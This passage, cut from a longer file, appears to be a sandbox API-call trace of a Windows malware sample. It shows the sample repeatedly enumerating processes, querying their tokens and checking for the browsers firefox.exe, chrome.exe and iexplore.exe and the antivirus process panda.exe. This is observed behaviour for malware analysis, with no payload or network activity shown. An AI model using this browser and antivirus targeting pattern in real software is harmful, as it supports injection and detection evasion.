(hObject=0x2f0) returned 1 [0142.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0142.088] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.088] CloseHandle (hObject=0x2f0) returned 1 [0142.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0142.089] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.089] CloseHandle (hObject=0x2f0) returned 1 [0142.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0142.089] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.089] CloseHandle (hObject=0x2f0) returned 1 [0142.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0142.089] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.089] CloseHandle (hObject=0x2f0) returned 1 [0142.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0142.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0142.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0142.090] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.090] CloseHandle (hObject=0x2f0) returned 1 [0142.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0142.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0142.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0142.090] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.091] CloseHandle (hObject=0x2f0) returned 1 [0142.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0142.091] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0142.091] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0142.091] GetLastError () returned 0x7a [0142.091] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0142.091] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0142.091] CloseHandle (hObject=0x2ec) returned 1 [0142.091] CloseHandle (hObject=0x2f0) returned 1 [0142.092] GetLengthSid (pSid=0x54010a8) returned 0x1c [0142.092] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0142.092] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0142.092] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0142.092] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0142.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0142.092] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.092] CloseHandle (hObject=0x2f0) returned 1 [0142.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xde0) returned 0x0 [0142.093] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0143.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf960) returned 0xc0000004 [0143.092] VirtualAlloc (lpAddress=0x0, dwSize=0x10960, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0143.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10960, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0143.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0143.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0143.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0143.098] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.098] CloseHandle (hObject=0x2f0) returned 1 [0143.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0143.098] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.098] CloseHandle (hObject=0x2f0) returned 1 [0143.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0143.098] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.098] CloseHandle (hObject=0x2f0) returned 1 [0143.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0143.099] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.099] CloseHandle (hObject=0x2f0) returned 1 [0143.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0143.099] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.099] CloseHandle (hObject=0x2f0) returned 1 [0143.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0143.099] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.099] CloseHandle (hObject=0x2f0) returned 1 [0143.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0143.099] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.099] CloseHandle (hObject=0x2f0) returned 1 [0143.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0143.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0143.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0143.100] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.100] CloseHandle (hObject=0x2f0) returned 1 [0143.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0143.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0143.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0143.100] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.100] CloseHandle (hObject=0x2f0) returned 1 [0143.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0143.100] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0143.100] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0143.100] GetLastError () returned 0x7a [0143.101] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0143.101] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0143.101] CloseHandle (hObject=0x2ec) returned 1 [0143.101] CloseHandle (hObject=0x2f0) returned 1 [0143.101] GetLengthSid (pSid=0x54010a8) returned 0x1c [0143.101] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0143.101] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0143.101] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0143.101] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0143.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0143.101] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0143.101] CloseHandle (hObject=0x2f0) returned 1 [0143.102] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0144.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf960) returned 0xc0000004 [0144.092] VirtualAlloc (lpAddress=0x0, dwSize=0x10960, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0144.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10960, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0144.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0144.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0144.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0144.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0144.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0144.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0144.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0144.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0144.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0144.100] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.100] CloseHandle (hObject=0x2f0) returned 1 [0144.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0144.101] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.101] CloseHandle (hObject=0x2f0) returned 1 [0144.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0144.101] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.101] CloseHandle (hObject=0x2f0) returned 1 [0144.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0144.101] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.101] CloseHandle (hObject=0x2f0) returned 1 [0144.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0144.102] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.102] CloseHandle (hObject=0x2f0) returned 1 [0144.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0144.102] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.102] CloseHandle (hObject=0x2f0) returned 1 [0144.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0144.102] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.102] CloseHandle (hObject=0x2f0) returned 1 [0144.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0144.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0144.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0144.103] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.103] CloseHandle (hObject=0x2f0) returned 1 [0144.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0144.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0144.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0144.103] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.104] CloseHandle (hObject=0x2f0) returned 1 [0144.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0144.104] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0144.104] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0144.104] GetLastError () returned 0x7a [0144.104] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0144.104] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0144.104] CloseHandle (hObject=0x2ec) returned 1 [0144.105] CloseHandle (hObject=0x2f0) returned 1 [0144.105] GetLengthSid (pSid=0x54010a8) returned 0x1c [0144.105] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0144.105] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0144.105] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0144.105] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0144.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0144.105] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0144.105] CloseHandle (hObject=0x2f0) returned 1 [0144.108] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0145.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf960) returned 0xc0000004 [0145.108] VirtualAlloc (lpAddress=0x0, dwSize=0x10960, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0145.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10960, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0145.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0145.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0145.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0145.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0145.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0145.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0145.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0145.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0145.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0145.114] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.114] CloseHandle (hObject=0x2f0) returned 1 [0145.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0145.115] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.115] CloseHandle (hObject=0x2f0) returned 1 [0145.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0145.115] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.115] CloseHandle (hObject=0x2f0) returned 1 [0145.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0145.115] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.115] CloseHandle (hObject=0x2f0) returned 1 [0145.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0145.116] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.116] CloseHandle (hObject=0x2f0) returned 1 [0145.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0145.116] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.116] CloseHandle (hObject=0x2f0) returned 1 [0145.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0145.116] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.117] CloseHandle (hObject=0x2f0) returned 1 [0145.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0145.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0145.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0145.117] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.117] CloseHandle (hObject=0x2f0) returned 1 [0145.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0145.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0145.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0145.118] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.118] CloseHandle (hObject=0x2f0) returned 1 [0145.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0145.118] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0145.118] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0145.118] GetLastError () returned 0x7a [0145.119] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0145.119] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0145.119] CloseHandle (hObject=0x2ec) returned 1 [0145.119] CloseHandle (hObject=0x2f0) returned 1 [0145.119] GetLengthSid (pSid=0x54010a8) returned 0x1c [0145.119] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0145.119] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0145.119] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0145.120] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0145.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0145.120] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0145.120] CloseHandle (hObject=0x2f0) returned 1 [0145.120] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0146.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf960) returned 0xc0000004 [0146.112] VirtualAlloc (lpAddress=0x0, dwSize=0x10960, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0146.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10960, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0146.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0146.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0146.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0146.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0146.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0146.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 